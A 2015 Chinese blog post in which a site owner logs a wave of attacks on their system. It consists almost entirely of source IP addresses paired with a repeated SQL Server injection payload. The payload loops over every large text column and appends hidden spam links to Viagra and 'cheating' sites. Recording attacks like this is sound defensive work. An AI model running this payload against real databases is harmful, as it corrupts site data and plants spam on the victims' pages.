2015年3月15日 星期日

駭客入侵

我的系統長久一直以來都有駭客攻擊,所以有安全保護機制,且經過「IBM Security AppScan」掃描過,雖然不算絕對安全,但可以保護資料不會外洩。其實每天都有攻擊事件,但都屬於小事件,已自動被系統檔掉,但最近出現一波大量攻擊,觸發我的警報系統,我就好奇研究這次駭客想幹麻:
r


來源位置:46.137.186.92
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reason women cheat <a href="http://blog.zycon.com/post/lean-initiatives-improve-medical-manufacturing-quality">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''read here'' when 1 then ''cheat wifes'' else ''redirect'' end +''</a> reasons wives cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:46.137.186.92
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reason women cheat <a href="http://blog.zycon.com/post/lean-initiatives-improve-medical-manufacturing-quality">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''read here'' when 1 then ''cheat wifes'' else ''redirect'' end +''</a> reasons wives cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:46.137.186.92
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reason women cheat <a href="http://blog.zycon.com/post/lean-initiatives-improve-medical-manufacturing-quality">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''read here'' when 1 then ''cheat wifes'' else ''redirect'' end +''</a> reasons wives cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:46.137.186.92
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reason women cheat <a href="http://blog.zycon.com/post/lean-initiatives-improve-medical-manufacturing-quality">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''read here'' when 1 then ''cheat wifes'' else ''redirect'' end +''</a> reasons wives cheat on husbands</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on husbands <a href="http://geekiest.net/post/250-awesome-photography-tutorials.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''website'' when 1 then ''how to cheat husband'' else ''click'' end +''</a> click here</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on husbands <a href="http://geekiest.net/post/250-awesome-photography-tutorials.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''website'' when 1 then ''how to cheat husband'' else ''click'' end +''</a> click here</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on husbands <a href="http://geekiest.net/post/250-awesome-photography-tutorials.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''website'' when 1 then ''how to cheat husband'' else ''click'' end +''</a> click here</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on husbands <a href="http://geekiest.net/post/250-awesome-photography-tutorials.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''website'' when 1 then ''how to cheat husband'' else ''click'' end +''</a> click here</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://community.vitechcorp.com/home/">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''my wife cheated now what'' when 1 then ''reason women cheat'' else ''click'' end +''</a> how to catch a cheat</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://community.vitechcorp.com/home/">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''my wife cheated now what'' when 1 then ''reason women cheat'' else ''click'' end +''</a> how to catch a cheat</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://community.vitechcorp.com/home/">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''my wife cheated now what'' when 1 then ''reason women cheat'' else ''click'' end +''</a> how to catch a cheat</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://community.vitechcorp.com/home/">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''my wife cheated now what'' when 1 then ''reason women cheat'' else ''click'' end +''</a> how to catch a cheat</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on their husbands <a href="http://blog.top50ranches.com/post/Argentina-food-and-wine.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''reasons women cheat'' when 1 then ''married affairs'' else ''why people cheat'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on their husbands <a href="http://blog.top50ranches.com/post/Argentina-food-and-wine.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''reasons women cheat'' when 1 then ''married affairs'' else ''why people cheat'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on their husbands <a href="http://blog.top50ranches.com/post/Argentina-food-and-wine.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''reasons women cheat'' when 1 then ''married affairs'' else ''why people cheat'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:217.162.2.32
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">reasons wives cheat on their husbands <a href="http://blog.top50ranches.com/post/Argentina-food-and-wine.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''reasons women cheat'' when 1 then ''married affairs'' else ''why people cheat'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.57.215.224
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://42spikes.com/page/how-to-buy-cheap-viagra-online">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''viagra 25 mg order'' when 1 then ''read'' else ''buy viagra canada warning'' end +''</a> how often take viagra</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.57.215.224
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://42spikes.com/page/how-to-buy-cheap-viagra-online">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''viagra 25 mg order'' when 1 then ''read'' else ''buy viagra canada warning'' end +''</a> how often take viagra</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.57.215.224
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read <a href="http://42spikes.com/page/how-to-buy-cheap-viagra-online">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''viagra 25 mg order'' when 1 then ''read'' else ''buy viagra canada warning'' end +''</a> how often take viagra</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.57.215.224
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">redirect <a href="http://blog.crmsociety.com/page/Top-5-Sites-To-Buy-Viagra-Online.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''who sings viva viagra commercial'' when 1 then ''buy viagra iframe src'' else ''generic viagra photo'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.57.215.224
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">redirect <a href="http://blog.crmsociety.com/page/Top-5-Sites-To-Buy-Viagra-Online.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''who sings viva viagra commercial'' when 1 then ''buy viagra iframe src'' else ''generic viagra photo'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.57.215.224
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">redirect <a href="http://blog.crmsociety.com/page/Top-5-Sites-To-Buy-Viagra-Online.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''who sings viva viagra commercial'' when 1 then ''buy viagra iframe src'' else ''generic viagra photo'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.57.215.224
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">redirect <a href="http://blog.crmsociety.com/page/Top-5-Sites-To-Buy-Viagra-Online.aspx">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''who sings viva viagra commercial'' when 1 then ''buy viagra iframe src'' else ''generic viagra photo'' end +''</a> read</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:86.58.164.228
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.ncb.org.uk/page/best-sites-to-buy-viagra">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''online'' when 1 then ''generic viagra reviews'' else ''read here'' end +''</a> website</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:86.58.164.228
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.ncb.org.uk/page/best-sites-to-buy-viagra">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''online'' when 1 then ''generic viagra reviews'' else ''read here'' end +''</a> website</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:86.58.164.228
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.ncb.org.uk/page/best-sites-to-buy-viagra">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''online'' when 1 then ''generic viagra reviews'' else ''read here'' end +''</a> website</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:86.58.164.228
入侵語法:http://google.com';declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://blog.ncb.org.uk/page/best-sites-to-buy-viagra">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''online'' when 1 then ''generic viagra reviews'' else ''read here'' end +''</a> website</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
入侵語法:http://google.com');declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://www.avonotakaronetwork.co.nz/blog/page/I-cheated-on-my-boyfriend">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''go'' when 1 then ''click'' else ''married men and affairs'' end +''</a> women that cheat with married men</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
入侵語法:http://google.com);declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://www.avonotakaronetwork.co.nz/blog/page/I-cheated-on-my-boyfriend">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''go'' when 1 then ''click'' else ''married men and affairs'' end +''</a> women that cheat with married men</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
入侵語法:http://google.com;declare @c cursor;declare @d varchar(4000);set @c=cursor for select 'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''<div style="display:none">read here <a href="http://www.avonotakaronetwork.co.nz/blog/page/I-cheated-on-my-boyfriend">''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''go'' when 1 then ''click'' else ''married men and affairs'' end +''</a> women that cheat with married men</div>'' else '''' end' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid=0 or indid=1) and DATA_TYPE like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c--'

來源位置:198.143.164.8
